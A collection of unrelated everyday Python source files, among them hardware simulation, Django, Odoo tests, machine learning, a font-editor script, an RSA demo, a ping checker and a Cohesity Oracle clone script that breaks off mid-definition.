    instance_lift = lift_step(flags_i, update_i, left_i, sam_i, right_i, res_o, update_o, clk_i)

    @always(delay(10))
    def clkgen():
        # 10 ns half-period clock
        clk_i.next = not clk_i

    @instance
    def stimulus():
        # Load inputs one per clock edge, then trigger the computation.
        left_i.next = 164
        yield clk_i.posedge
        sam_i.next = 160
        yield clk_i.posedge
        right_i.next = 170
        yield clk_i.posedge
        flags_i.next = 7
        yield clk_i.posedge
        update_i.next = 1
        yield clk_i.posedge
        yield clk_i.posedge
        print ('%d %s %s %s %s %s' % (now(),bin(left_i,W0), bin(sam_i,W0), bin(right_i,W0), bin(flags_i,3),bin(res_o,W0)))
        yield clk_i.posedge
        raise StopSimulation
    return instances()
def convert(args):
    """Convert lift_step to VHDL (an earlier Verilog call is kept for reference)."""
    #toVerilog(dwt,flgs,upd,lft,sam,rht,lift,done,clock)
    toVHDL(lift_step, flags_i, update_i, left_i, sam_i, right_i, res_o, update_o, clk_i)
def main():
    """Dispatch on the CLI flags: run the traced simulation and/or convert to VHDL."""
    options = cliparse()
    if options.test:
        traced = traceSignals(tb, flags_i, update_i, left_i, sam_i, right_i, res_o, update_o, clk_i)
        Simulation(traced).run()
    if options.convert:
        convert(options)


if __name__ == '__main__':
    main()
|
# Generated by Django 3.2 on 2021-05-13 22:09
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 3.2): redefine Accounts.user_type as a CharField
    with four choices; max_length=17 fits the longest key, 'ORGANISATION_USER'."""

    dependencies = [
        ('accounts', '0002_accounts_user_type'),
    ]

    operations = [
        migrations.AlterField(
            model_name='accounts',
            name='user_type',
            field=models.CharField(choices=[('GENERAL_USER', 'General User'), ('BUSINESS_USER', 'Business User'), ('HEALTH_USER', 'Health User'), ('ORGANISATION_USER', 'Organisation User')], default='GENERAL_USER', max_length=17),
        ),
    ]
|
from json import load
from coala_json.reporters.ResultReporter import ResultReporter
class HtmlReporter(ResultReporter):
    """
    Contain methods to produce Html test report from coala-json

    coala_json is coala output in json format, usually produced by
    running coala with --json option
    """

    def to_output(self):
        """
        Convert coala-json output to html table report

        :return: html table report as a single string
        """
        output_json = load(self.coala_json)['results']
        # Collect fragments in a list and join once at the end: repeated
        # string += in the loop is quadratic in the number of problems.
        parts = ['<html><head><title>Test Results Report</title></head><body>'
                 '<table border="1"><h2>Test Result Reports</h2><tr>'
                 '<th>Line</th><th>Column</th><th>Severity</th>'
                 '<th>Message</th><th>Origin</th><th>RuleID</th>'
                 '<th>File</th></tr>']
        for problems in output_json.values():
            for problem in problems:
                # One <tr> per reported problem, columns matching the header.
                message = self.loader.extract_message(problem)
                row = (self.loader.extract_affected_line(problem),
                       self.loader.extract_affected_column(problem),
                       self.loader.extract_severity(problem),
                       message,
                       self.loader.extract_origin(problem),
                       self.loader.extract_error_code(message),
                       self.loader.extract_file(problem))
                parts.append('<tr><td>{}</td><td>{}</td><td>{}</td>'
                             '<td>{}</td><td>{}</td><td>{}</td><td>{}</td>'
                             '</tr>'.format(*row))
        parts.append('</table></body></html>\n')
        return ''.join(parts)
|
from random import random,seed,randint,shuffle
import numpy,os
# Generate 18 test files ("test0" .. "test17"), each holding an m x n grid of
# discs, where every disc is one shuffled permutation of the four colours.
colors = ['R', 'G', 'Y', 'B']
for k in range(18):
    # Seed the stdlib RNG per test so m and n are reproducible.
    seed(k)
    m = randint(1, 60)
    n = randint(1, 60)
    testname = "test" + str(k)
    discs = []
    for i in range(m):
        for j in range(n):
            # NOTE(review): random.seed() only seeds the stdlib RNG; it does
            # NOT affect numpy's generator, so numpy.random.shuffle below is
            # effectively unseeded.  Kept as-is to preserve existing output.
            seed(i + j)
            numpy.random.shuffle(colors)
            discs.append(list(colors))
    # 'w' truncates any existing file, replacing the old remove-then-append
    # pattern; the context manager guarantees the handle is closed (the
    # original file object was never closed).
    with open(testname, 'w') as f:
        f.write(str(m))
        f.write(" ")
        f.write(str(n))
        f.write('\n')
        for disc in discs:
            f.write(' '.join(disc))
            f.write('\n')
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo.tests.common import TransactionCase
from odoo.modules.module import get_module_resource
class TestCSVFile(TransactionCase):
    """ Tests for importing a bank statement in CSV file format
    (account.bank.statement.import). """
    def test_csv_file_import(self):
        # Get CSV file content.  A context manager closes the handle -- the
        # original `open(...).read()` leaked the file descriptor.
        csv_file_path = get_module_resource('account_bank_statement_import_csv', 'test_csv_file', 'test_csv.csv')
        with open(csv_file_path, 'rb') as csv_fh:
            csv_file = csv_fh.read()
        # Create a bank account and journal corresponding to the CSV file
        # (same currency and account number).
        bank_journal = self.env['account.journal'].create({
            'name': 'Bank 123456',
            'code': 'BNK67',
            'type': 'bank',
            'bank_acc_number': '123456',
        })
        bank_journal_id = bank_journal.id
        if bank_journal.company_id.currency_id != self.env.ref("base.USD"):
            bank_journal.write({'currency_id': self.env.ref("base.USD").id})
        # Use an import wizard to process the file.
        import_wizard = self.env['base_import.import'].create({
            'res_model': 'account.bank.statement.line',
            'file': csv_file,
            'file_name': 'test_csv.csv',
            'file_type': 'text/csv',
        })
        options = {
            'date_format': '%m %d %y',
            'keep_matches': False,
            'encoding': 'utf-8',
            'fields': [],
            'quoting': '"',
            'bank_stmt_import': True,
            'headers': True,
            'separator': ';',
            'float_thousand_separator': ',',
            'float_decimal_separator': '.',
            'advanced': False}
        fields = ['date', False, 'name', 'amount', 'balance']
        import_wizard.with_context(journal_id=bank_journal_id).do(fields, [], options, dryrun=False)
        # Check the imported bank statement.
        bank_st_record = self.env['account.bank.statement'].search([('reference', '=', 'test_csv.csv')])[0]
        self.assertEqual(bank_st_record.balance_start, 21699.55)
        self.assertEqual(bank_st_record.balance_end_real, 23462.55)
        # Check an imported bank statement line.
        line = bank_st_record.line_ids.filtered(lambda r: r.name == 'ACH CREDIT"CHECKFLUID INC -013015')
        self.assertEqual(str(line.date), '2015-02-03')
        self.assertEqual(line.amount, 2500.00)
|
import numpy as np
# Experiment constants -- consumers are not visible in this chunk, so the
# exact meanings below are assumptions to be confirmed against caller code.
GAMMA = np.exp(-5)  # e**-5; presumably a kernel width / decay factor -- TODO confirm
NSUBSETSIZE = 20    # size of each sampled subset -- verify against usage
BOUND = 5           # value bound / clipping limit -- verify against usage
NN = 1000           # sample or iteration count -- verify against usage
BIN0 = 10           # lower bin parameter -- verify against usage
BIN1 = 30           # upper bin parameter -- verify against usage
|
import pygame
pygame.init()
# Sound effect played on crash events.
crash_sound = pygame.mixer.Sound("assets/sounds/crash.wav")
# Window geometry and main drawing surface.
window_width = 800
window_height = 600
surface = pygame.display.set_mode((window_width, window_height))
clock = pygame.time.Clock()
pygame.display.set_caption("Race Car by S^#!L")
# The car sprite doubles as the window icon.
car_obj = pygame.image.load("assets/img/racecar.png")
pygame.display.set_icon(car_obj)
|
import numpy as np
import pandas as pd
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split
# 1. Data
# Feature importances from a previous GradientBoostingRegressor run on the
# Boston dataset, pasted as a whitespace-separated string.
values = '3.00427759e-02 1.53808812e-04 2.66646072e-03 1.13227503e-03\
3.07877293e-02 3.79559378e-01 8.50877684e-03 9.79148714e-02\
7.55640378e-04 1.18182875e-02 3.47822800e-02 5.52293760e-03\
3.96354779e-01'
feature_importances = pd.DataFrame(list(map(float, values.split()))).sort_values(by=0)
# Drop the least-important 25% of features; keep the column indices of the rest.
percent = 0.25
index = sorted(feature_importances.iloc[int(np.round(len(feature_importances.index)*percent)):,:].index)
print(index)
# NOTE(review): load_boston was removed in scikit-learn >= 1.2; this script
# requires an older scikit-learn version.
dataset = load_boston()
x = pd.DataFrame(dataset.data).iloc[:,index]
y = pd.DataFrame(dataset.target)
print(x)
print(y)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=44)
# 2. Model
model = GradientBoostingRegressor()
# 3. Training
model.fit(x_train, y_train)
# 4. Evaluation / prediction
acc = model.score(x_test, y_test)
print(model.feature_importances_)
print('acc :', acc)
import matplotlib.pyplot as plt
import numpy as np
def plot_feature_importances_dataset(model):
    # Horizontal bar chart of the fitted model's feature importances,
    # labelled with the Boston feature names of the kept columns.
    n_features = x.shape[1]
    plt.barh(np.arange(n_features), model.feature_importances_, align='center')
    plt.yticks(np.arange(n_features), [dataset.feature_names[x] for x in index])
    plt.xlabel('Feature Importances')
    plt.ylabel('Features')
    plt.ylim(-1, n_features)
plot_feature_importances_dataset(model)
plt.show()
'''
# model.feature_importances_
[3.00427759e-02 1.53808812e-04 2.66646072e-03 1.13227503e-03
3.07877293e-02 3.79559378e-01 8.50877684e-03 9.79148714e-02
7.55640378e-04 1.18182875e-02 3.47822800e-02 5.52293760e-03
3.96354779e-01]
acc : 0.8941528927104803
'''
'''
# 25% 미만 인 feature 제거 후
[0.02836551 0.00293281 0.03479936 0.37954049 0.0088569 0.09786892
0.01213989 0.03356735 0.00570301 0.39622577]
acc : 0.8938502491234904
'''
#MenuTitle: Metrics Key Manager
# -*- coding: utf-8 -*-
__doc__="""
Batch apply metrics keys to the current font.
"""
import vanilla
# Default metrics-key rules, one per line: "=<key>: <glyph names...>".
# Each listed glyph gets the metrics key on its left/right side.
LeftKeys="""
=H: B D E F I K L N P R Thorn Germandbls M
=O: C G Q
=o: c d e q eth
=h: b k l thorn
=n: idotless m p r
=|n: u
"""
RightKeys="""
=|: A H I M N O T U V W X Y
=O: D
=U: J
=o: b p thorn
=n: h m
=|n: idotless u
"""
class MetricsKeyManager( object ):
	"""Floating-window UI that batch-applies left/right metrics keys to the
	glyphs of the frontmost font.  Runs inside the Glyphs.app Python 2
	runtime (print statements, the global Glyphs object, vanilla UI)."""
	def __init__( self ):
		# Window 'self.w':
		windowWidth = 350
		windowHeight = 240
		windowWidthResize = 1000 # user can resize width by this value
		windowHeightResize = 1000 # user can resize height by this value
		self.w = vanilla.FloatingWindow(
			( windowWidth, windowHeight ), # default window size
			"Metrics Key Manager", # window title
			minSize = ( windowWidth, windowHeight-100 ), # minimum size (for resizing)
			maxSize = ( windowWidth + windowWidthResize, windowHeight + windowHeightResize ), # maximum size (for resizing)
			autosaveName = "com.mekkablue.MetricsKeyManager.mainwindow" # stores last window position and size
		)
		# UI elements:
		linePos, inset, lineHeight, boxHeight = self.getMeasurements()
		self.w.LeftMetricsKeysText = vanilla.TextBox( (inset, linePos+2, 70, 14), u"Left Keys:", sizeStyle='small', selectable=True )
		self.w.LeftMetricsKeys = vanilla.EditText( (inset+70, linePos, -inset, boxHeight), "", callback=self.SavePreferences, sizeStyle='small' )
		linePos += boxHeight + 10
		self.w.RightMetricsKeysText = vanilla.TextBox( (inset, linePos+2, 70, 14), u"Right Keys:", sizeStyle='small', selectable=True )
		self.w.RightMetricsKeys = vanilla.EditText( (inset+70, linePos, -inset, boxHeight), "", callback=self.SavePreferences, sizeStyle='small' )
		for editField in (self.w.LeftMetricsKeys, self.w.RightMetricsKeys):
			editField.getNSTextField().setToolTip_(u"Enter a metrics key like '=H', followed by a colon (:), followed by glyph names, spearated by space, comma, or any other separator that cannot be part of a glyph name. (Glyph names can contain A-Z, a-z, 0-9, period, underscore and hyphen.)")
		# Run Button:
		self.w.resetButton = vanilla.Button( (-180-inset, -20-inset, -inset-90, -inset), u"⟲ Reset", sizeStyle='regular', callback=self.SetDefaults )
		self.w.runButton = vanilla.Button( (-80-inset, -20-inset, -inset, -inset), "Apply", sizeStyle='regular', callback=self.MetricsKeyManagerMain )
		self.w.setDefaultButton( self.w.runButton )
		# Load Settings:
		if not self.LoadPreferences():
			print "Note: 'Metrics Key Manager' could not load preferences. Will resort to defaults"
		# Bind resizing method:
		self.w.bind("resize", self.windowResize)
		# Open window and focus on it:
		self.w.open()
		self.w.makeKey()
	def getMeasurements(self, sender=None):
		"""Return (linePos, inset, lineHeight, boxHeight); boxHeight scales
		with the current window height so both edit boxes share the space."""
		lineHeight = 22
		currentWindowHeight = self.w.getPosSize()[3]
		boxHeight = currentWindowHeight/2 - lineHeight*1.5
		return 12, 15, lineHeight, boxHeight
	def windowResize(self, sender=None):
		"""Re-layout the two text boxes/edit fields when the window resizes."""
		linePos, inset, lineHeight, boxHeight = self.getMeasurements()
		self.w.LeftMetricsKeysText.setPosSize( (inset, linePos+2, 70, 14) )
		self.w.LeftMetricsKeys.setPosSize( (inset+70, linePos, -inset, boxHeight) )
		linePos += boxHeight + 10
		self.w.RightMetricsKeysText.setPosSize( (inset, linePos+2, 70, 14) )
		self.w.RightMetricsKeys.setPosSize( (inset+70, linePos, -inset, boxHeight) )
	def SavePreferences( self, sender ):
		"""Persist both edit fields into Glyphs.defaults; False on failure."""
		try:
			Glyphs.defaults["com.mekkablue.MetricsKeyManager.LeftMetricsKeys"] = self.w.LeftMetricsKeys.get()
			Glyphs.defaults["com.mekkablue.MetricsKeyManager.RightMetricsKeys"] = self.w.RightMetricsKeys.get()
		except:
			return False
		return True
	def LoadPreferences( self ):
		"""Register the module defaults and restore saved field contents;
		False on failure."""
		try:
			Glyphs.registerDefault("com.mekkablue.MetricsKeyManager.LeftMetricsKeys", LeftKeys)
			Glyphs.registerDefault("com.mekkablue.MetricsKeyManager.RightMetricsKeys", RightKeys)
			self.w.LeftMetricsKeys.set( Glyphs.defaults["com.mekkablue.MetricsKeyManager.LeftMetricsKeys"] )
			self.w.RightMetricsKeys.set( Glyphs.defaults["com.mekkablue.MetricsKeyManager.RightMetricsKeys"] )
		except:
			return False
		return True
	def SetDefaults(self, sender=None):
		"""Reset both fields to the module-level LeftKeys/RightKeys defaults."""
		self.w.RightMetricsKeys.set( RightKeys.strip() )
		self.w.LeftMetricsKeys.set( LeftKeys.strip() )
		# update settings to the latest user input:
		if not self.SavePreferences( self ):
			print "Note: 'Metrics Key Manager' could not write preferences."
	def parseGlyphNames(self, glyphNameText):
		"""Split arbitrary text into glyph names: any character outside the
		allowed glyph-name alphabet acts as a separator."""
		possibleChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789.-_"
		glyphNames = []
		currName = ""
		# trailing space forces the final accumulated name to be flushed
		for currChar in glyphNameText.strip()+" ":
			if currChar in possibleChars:
				currName += currChar
			else:
				if currName:
					glyphNames.append(currName)
					currName = ""
		return tuple(glyphNames)
	def parseKeyText(self, keyText):
		"""Parse rule text into {metrics key: (glyph names, ...)}; lines
		without a colon are ignored."""
		parseDict = {}
		keyText = keyText.strip()
		for line in keyText.splitlines():
			line = line.strip()
			if line and ":" in line:
				key, glyphNameText = line.split(":")[:2]
				parseDict[key] = self.parseGlyphNames( glyphNameText )
		return parseDict
	def MetricsKeyManagerMain( self, sender ):
		"""Apply the parsed left/right key rules to the frontmost font."""
		try:
			# update settings to the latest user input:
			if not self.SavePreferences( self ):
				print "Note: 'Metrics Key Manager' could not write preferences."
			thisFont = Glyphs.font # frontmost font
			if not thisFont:
				Message(title="Metrics Key Manager Error", message="No font open. Metrics keys can only be applied to the frontmost font.", OKButton=None)
			else:
				print "Metrics Key Manager Report for %s" % thisFont.familyName
				print thisFont.filepath
				print
				# to be turned into selectable options:
				# delete all existing keys, respect existing keys, overwrite existing keys
				respectExistingKeys = False
				deleteExistingKeys = False
				includeNonexportingGlyphs = True
				shouldOpenTabWithAffectedGlyphs = False
				LeftKeysText = Glyphs.defaults["com.mekkablue.MetricsKeyManager.LeftMetricsKeys"]
				leftDict = self.parseKeyText(LeftKeysText)
				RightKeysText = Glyphs.defaults["com.mekkablue.MetricsKeyManager.RightMetricsKeys"]
				rightDict = self.parseKeyText(RightKeysText)
				affectedGlyphs = []
				for key in leftDict.keys():
					print u"⬅️ Setting Left Key: '%s'" % key
					glyphNames = leftDict[key]
					for glyphName in glyphNames:
						glyph = thisFont.glyphs[glyphName]
						if glyph:
							glyph.leftMetricsKey = key
							affectedGlyphs.append(glyphName)
						else:
							print u"  ❌ Glyph '%s' not in font. Skipped." % glyphName
				for key in rightDict.keys():
					print u"➡️ Right Key: '%s'" % key
					glyphNames = rightDict[key]
					for glyphName in glyphNames:
						glyph = thisFont.glyphs[glyphName]
						if glyph:
							glyph.rightMetricsKey = key
							affectedGlyphs.append(glyphName)
						else:
							print u"  ❌ Glyph '%s' not in font. Skipped." % glyphName
				if affectedGlyphs and shouldOpenTabWithAffectedGlyphs:
					affectedGlyphs = set(affectedGlyphs)
					thisFont.newTab( "/"+"/".join(affectedGlyphs) )
		except Exception, e:
			# brings macro window to front and reports error:
			Glyphs.showMacroWindow()
			print "Metrics Key Manager Error: %s" % e
			import traceback
			print traceback.format_exc()
MetricsKeyManager()  # instantiate: builds the UI and opens the floating window
#调用低通api实现RSA
import rsa
import time
# Time the key generation.
start_time = time.time()
key = rsa.newkeys(1024)  # argument is the modulus size in bits (p*q); bigger keys take longer to generate
privateKey = key[1]
publicKey = key[0]
#print(privateKey)
#print(publicKey)
end_time = time.time()
print("make a key:", end_time - start_time)
# Public/private key pair generated above.
message = 'hello'
message = message.encode()
cryptedMessage = rsa.encrypt(message, publicKey)
print("crypted:", cryptedMessage)
print("length of cryptedMessage:", len(cryptedMessage))
# Encryption step done; now decrypt with the private key.
decrypetdMessage = rsa.decrypt(cryptedMessage, privateKey)
print("decrypet:", decrypetdMessage)
# Decryption step done; report combined encrypt+decrypt time.
now_time = time.time()
print("crypt and decrypt:", now_time - end_time)
|
from game.items.item import Log
from game.skills import SkillTypes
class NormalLog(Log):
    # Basic log item: display name, item value, XP granted per skill, and the
    # minimum skill levels required (semantics inherited from the Log base
    # class -- confirm exact meaning of `value` there).
    name = 'Normal Log'
    value = 97
    xp = {SkillTypes.firemaking: 40, SkillTypes.fletching: 1}
    skill_requirement = {SkillTypes.firemaking: 1, SkillTypes.fletching: 1}
#!/usr/bin/python
# --*-- coding:utf-8 --*--
from __future__ import print_function
import subprocess
import threading
#
def is_reacheable (ip):
    """Ping *ip* once and print whether it is reachable.

    subprocess.call returns the command's exit status: ping exits 0 when
    the host answered and non-zero otherwise.  The original check was
    inverted (a non-zero/failed ping printed "alive").
    :param ip: host name or IP address string
    """
    if subprocess.call(["ping","-c","1",ip]) == 0:
        print ("{0} is alive ".format(ip))
    else:
        print ("{0} is unreacheable ".format(ip))
def main ():
    """Read host addresses from ips.txt (one per line) and ping each one
    concurrently, one thread per host."""
    # Generate ips.txt e.g. with one of:
    #for i in {1..255} ;do echo 10.1.1.${i} >> ips.txt ;done
    #for i in $(seq 1 255) ;do echo 10.1.1.${i} >> ips.txt ;done
    with open("ips.txt") as f :
        lines =f.read()
    lines =lines.splitlines() # strip the trailing newlines
    threads=[]
    for line in lines: # args must be a tuple: the trailing comma is required for a single argument, otherwise it is not a tuple and Thread() fails
        thr=threading.Thread(target=is_reacheable, args=(line,))
        thr.start()
        threads.append(thr)
    # wait for all pings to finish before exiting
    for thr in threads:
        thr.join()
if __name__=="__main__":
    main()
|
import os
import time
import tensorflow as tf
import joblib
import logging
from utils.all_utils import get_time_stamp
def create_and_save_checkpoint_callback(callbacks_dir,checkpoint_dir):
    """Create a Keras ModelCheckpoint callback and serialize it with joblib.

    :param callbacks_dir: directory receiving the serialized callback (.cb file)
    :param checkpoint_dir: directory where the checkpoint model (.h5) will be written
    """
    checkpoint_file_path = os.path.join(checkpoint_dir, "ckpt_model.h5")
    checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
        filepath=checkpoint_file_path,
        save_best_only=True  # keep only the best model seen during training
    )
    ckpt_callback_filepath = os.path.join(callbacks_dir, "checkpoint_cb.cb")
    joblib.dump(checkpoint_callback, ckpt_callback_filepath)
    # Fixed copy-pasted log message: this is the checkpoint callback, not tensorboard.
    logging.info(f"checkpoint callback is being saved at {ckpt_callback_filepath}")
def create_and_save_tensorboard_callback(Callbacks_dir, tensorboard_log_dir):
    """Create a TensorBoard callback with a timestamped log directory and
    serialize it with joblib into *Callbacks_dir*."""
    run_name = get_time_stamp("tb_logs")
    running_log_dir = os.path.join(tensorboard_log_dir, run_name)
    tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=running_log_dir)
    callback_file = os.path.join(Callbacks_dir, "tb_cb.cb")
    joblib.dump(tensorboard_callback, callback_file)
    logging.info(f"tensorboard callback is being saved at {callback_file}")
def get_callbacks(callback_dir_path):
    """Load and return every serialized (.cb) callback in *callback_dir_path*."""
    loaded = []
    for entry in os.listdir(callback_dir_path):
        if entry.endswith(".cb"):
            loaded.append(joblib.load(os.path.join(callback_dir_path, entry)))
    logging.info(f"saved callbacks are loaded from {callback_dir_path}")
    return loaded
|
# %%
import os
# %%
# Root of the preprocessed RSVP dataset, located under the user's home
# directory (requires the HOME environment variable, i.e. a POSIX shell).
DataFolder = os.path.join(os.environ['HOME'],
                          'RSVP_dataset',
                          'processed_data')
|
from selenium import webdriver
from BrowserFactory.AbstractFactory import AbstractFactory
# This class is obsolete
class FirefoxBrowser(AbstractFactory):
    """Firefox implementation of the browser factory (marked obsolete)."""

    def __init__(self):
        # Start geckodriver, then apply the standard session setup.
        self.driver = webdriver.Firefox(executable_path="/usr/bin/geckodriver")
        self.driver.implicitly_wait(10)
        self.driver.maximize_window()

    def open(self, url):
        """Navigate the browser to *url*."""
        self.driver.get(url)

    def close(self):
        """End the webdriver session and close the browser."""
        self.driver.quit()
|
import os
def split_by_n(fname, n=3):
    '''
    Split a text file into *n* roughly equal-sized pieces on line boundaries.

    The pieces are written next to the input as "<fname>_00.txt",
    "<fname>_01.txt", ... in order.

    :param fname: input, path of the text file to split
    :param n: input, number of pieces (1..99)
    :return: None (writes n files to disk)
    '''
    assert isinstance(fname, str)
    assert isinstance(n, int)
    assert 1 <= n <= 99
    # `total_bytes` replaces the original local named `sum`, which shadowed
    # the builtin.
    total_bytes = os.path.getsize(fname)
    target = total_bytes / n  # approximate byte size of each piece
    with open(fname, 'r') as f:
        lines = f.readlines()
    # Find the cut points: boundaries[i] is the index of the first line of
    # piece i; a cut is recorded once the running size exceeds `target`.
    boundaries = [0]
    part = 0
    for i in range(len(lines)):
        if part <= target:
            part = part + len(lines[i])
        elif part > target:
            boundaries.append(i - 1)
            # restart the running size with the overflowing line plus the
            # previous one, which now opens the new piece
            part = len(lines[i]) + len(lines[i - 1])
            if len(boundaries) >= n:
                break
    boundaries.append(len(lines))
    # Write each piece.  Binary mode + explicit utf8 encoding keeps the byte
    # counts exact (text mode may translate newlines and change sizes).
    for (x, y) in zip(range(n), boundaries[1:]):
        with open('{}{}{:0>2d}{}'.format(fname, '_', x, '.txt'), 'wb') as out:
            for line in lines[boundaries[boundaries.index(y) - 1]:y]:
                out.write(line.encode('utf8'))
    return
|
import os
import subprocess
'''
Read events from allEvents.txt file.
Each line of the file has to be of the structure:
run:lumi:event
'''
# Collect the events to pick: one "run:lumi:event" string per line.
eventList = []
with open("allEvents.txt","r") as f:
    while True:
        l = f.readline()
        if l =='': break
        eventList.append(l.replace('\n',''))
# Run-number range of each 2016 data-taking era, with its dataset path.
runsAndEras = {\
    '2016B': {'range': (272007, 275376), 'dataset':'/SingleElectron/Run2016B-03Feb2017_ver2-v2/MINIAOD'},
    '2016C': {'range': (275657, 276283), 'dataset':'/SingleElectron/Run2016C-03Feb2017-v1/MINIAOD'},
    '2016D': {'range': (276315, 276811), 'dataset':'/SingleElectron/Run2016D-03Feb2017-v1/MINIAOD'},
    '2016E': {'range': (276831, 277420), 'dataset':'/SingleElectron/Run2016E-03Feb2017-v1/MINIAOD'},
    '2016F': {'range': (277772, 278808), 'dataset':'/SingleElectron/Run2016F-03Feb2017-v1/MINIAOD'},
    '2016G': {'range': (278820, 280385), 'dataset':'/SingleElectron/Run2016G-03Feb2017-v1/MINIAOD'},
    '2016Hv2': {'range': (280919, 284037), 'dataset':'/SingleElectron/Run2016H-03Feb2017_ver2-v1/MINIAOD'},
    '2016Hv3': {'range': (284037, 284044), 'dataset':'/SingleElectron/Run2016H-03Feb2017_ver3-v1/MINIAOD'},
}
# For each event, resolve its dataset from the run number and call
# edmPickEvents.py (Python 2 script: print statements).
for i,ev in enumerate(sorted(eventList)):
    run_str = ev.replace(':','_')
    run = int(ev.split(':')[0])
    dataset = False  # falsy sentinel until a matching era is found
    for era in runsAndEras:
        if run >= runsAndEras[era]['range'][0] and run <= runsAndEras[era]['range'][1]:
            dataset = runsAndEras[era]['dataset']
    if dataset:
        print "Event %s should be in datset %s"%(ev, dataset)
    else: print ":("
    oFile = "picks/event_%s"%i
    cmd = ["edmPickEvents.py", dataset, ev, "--output", oFile, "--runInteractive"]
    print ' '.join(cmd)
    subprocess.call(cmd)
|
#!/usr/bin/env python
"""Clone an Oracle DB Using python"""
### usage: ./cloneOracle.py -v mycluster \
# -u myuser \
# -d mydomain.net \
# -ss oracleprod.mydomain.net \
# -ts oracledev.mydomain.net \
# -sd proddb \
# -td devdb \
# -oh /home/oracle/app/oracle/product/11.2.0/dbhome_1 \
# -ob /home/oracle/app/oracle \
# -w
### import pyhesity wrapper module
from pyhesity import *
from time import sleep
### command line arguments
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--vip', type=str, required=True)  # Cohesity cluster name or IP
parser.add_argument('-u', '--username', type=str, required=True)  # Cohesity Username
parser.add_argument('-d', '--domain', type=str, default='local')  # Cohesity User Domain
parser.add_argument('-ss', '--sourceserver', type=str, required=True)  # name of source oracle server
parser.add_argument('-sd', '--sourcedb', type=str, required=True)  # name of source oracle DB
parser.add_argument('-ts', '--targetserver', type=str, default=None)  # name of target oracle server
parser.add_argument('-td', '--targetdb', type=str, default=None)  # name of target oracle DB
parser.add_argument('-oh', '--oraclehome', type=str, required=True)  # oracle home path on target
parser.add_argument('-ob', '--oraclebase', type=str, required=True)  # oracle base path on target
parser.add_argument('-lt', '--logtime', type=str, default=None)  # point in time to replay logs to (parsed by dateToUsecs) -- original comment was a copy-paste of the -ob line
parser.add_argument('-l', '--latest', action='store_true')  # replay logs to the latest point available
parser.add_argument('-w', '--wait', action='store_true')  # wait for completion
args = parser.parse_args()
# unpack arguments; target server/db fall back to the source values
vip = args.vip
username = args.username
domain = args.domain
sourceserver = args.sourceserver
sourcedb = args.sourcedb
if args.targetserver is None:
    targetserver = sourceserver
else:
    targetserver = args.targetserver
if args.targetdb is None:
    targetdb = sourcedb
else:
    targetdb = args.targetdb
oraclehome = args.oraclehome
oraclebase = args.oraclebase
logtime = args.logtime
latest = args.latest
wait = args.wait
### authenticate
apiauth(vip, username, domain)
### search for view to clone
searchResults = api('get', '/searchvms?entityTypes=kOracle&vmName=%s' % sourcedb)
if len(searchResults) == 0:
    print("SourceDB %s not found" % sourcedb)
    exit()
### narrow search results to the correct server (match any object alias)
searchResults = [searchResult for searchResult in searchResults['vms'] if sourceserver.lower() in [x.lower() for x in searchResult['vmDocument']['objectAliases']]]
if len(searchResults) == 0:
    print("SourceDB %s on Server %s not found" % (sourcedb, sourceserver))
    exit()
### find latest snapshot (newest snapshotTimestampUsecs first)
latestdb = sorted(searchResults, key=lambda result: result['vmDocument']['versions'][0]['snapshotTimestampUsecs'], reverse=True)[0]
version = latestdb['vmDocument']['versions'][0]
ownerId = latestdb['vmDocument']['objectId']['entity']['oracleEntity']['ownerId']
### find target host
entities = api('get', '/appEntities?appEnvType=19')
# Initialize the result so the not-found check below works: previously an
# unmatched server name left `targetEntity` unassigned, raising NameError
# instead of printing the error message.
targetEntity = None
for entity in entities:
    if entity['appEntity']['entity']['displayName'].lower() == targetserver.lower():
        targetEntity = entity
if targetEntity is None:
    print("target server not found")
    exit()
# handle log replay: find a snapshot whose archived-log time range covers the
# requested point in time (or the latest available log end)
versionNum = 0
validLogTime = False
if logtime is not None or latest is True:
    if logtime is not None:
        logusecs = dateToUsecs(logtime)
    dbversions = latestdb['vmDocument']['versions']
    for version in dbversions:
        # find db date before log time
        GetRestoreAppTimeRangesArg = {
            "type": 19,
            "restoreAppObjectVec": [
                {
                    "appEntity": latestdb['vmDocument']['objectId']['entity'],
                    "restoreParams": {
                        "sqlRestoreParams": {
                            "captureTailLogs": True
                        },
                        "oracleRestoreParams": {
                            "alternateLocationParams": {
                                "oracleDBConfig": {
                                    "controlFilePathVec": [],
                                    "enableArchiveLogMode": True,
                                    "redoLogConf": {
                                        "groupMemberVec": [],
                                        "memberPrefix": "redo",
                                        "sizeMb": 20
                                    },
                                    "fraSizeMb": 2048
                                }
                            },
                            "captureTailLogs": False,
                            "secondaryDataFileDestinationVec": [
                                {}
                            ]
                        }
                    }
                }
            ],
            "ownerObjectVec": [
                {
                    "jobUid": latestdb['vmDocument']['objectId']['jobUid'],
                    "jobId": latestdb['vmDocument']['objectId']['jobId'],
                    "jobInstanceId": version['instanceId']['jobInstanceId'],
                    "startTimeUsecs": version['instanceId']['jobStartTimeUsecs'],
                    "entity": {
                        "id": ownerId
                    },
                    "attemptNum": 1
                }
            ]
        }
        logTimeRange = api('post', '/restoreApp/timeRanges', GetRestoreAppTimeRangesArg)
        if latest is True:
            # no log range at all: fall back to a plain snapshot clone
            if 'timeRangeVec' not in logTimeRange['ownerObjectTimeRangeInfoVec'][0]:
                logTime = None
                latest = None
                break
        if 'timeRangeVec' in logTimeRange['ownerObjectTimeRangeInfoVec'][0]:
            logStart = logTimeRange['ownerObjectTimeRangeInfoVec'][0]['timeRangeVec'][0]['startTimeUsecs']
            logEnd = logTimeRange['ownerObjectTimeRangeInfoVec'][0]['timeRangeVec'][0]['endTimeUsecs']
            if latest is True:
                # replay to one second before the newest available log
                logusecs = logEnd - 1000000
                validLogTime = True
                break
            if logStart <= logusecs and logusecs <= logEnd:
                validLogTime = True
                break
        versionNum += 1
# clone task definition; `version` is whichever snapshot the loop above
# settled on (or the newest one when no log replay was requested)
cloneParams = {
    "name": "Clone-Oracle",
    "action": "kCloneApp",
